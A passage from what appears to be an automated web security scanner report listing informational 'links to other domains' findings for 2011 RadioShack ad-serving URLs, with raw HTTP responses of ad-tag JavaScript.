document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=703327951?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=703327951?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=703327951?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.120. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=17382567?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=17382567?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:51:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3180
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=17382567?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=17382567?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.121. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=10626607?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=10626607?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=10626607?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=10626607?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3180
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=10626607?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=10626607?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=10626607?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=10626607?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.122. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1911576582?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1911576582?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1911576582?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1911576582?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296268201

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1911576582?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1911576582?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1911576582?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1911576582?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.123. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1202403029?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1202403029?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1202403029?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1202403029?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1202403029?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1202403029?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1202403029?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1202403029?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.124. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1819507567?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1819507567?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1819507567?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1819507567?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:15:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1819507567?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1819507567?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1819507567?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1819507567?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.125. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The page was loaded from a URL containing a query string:

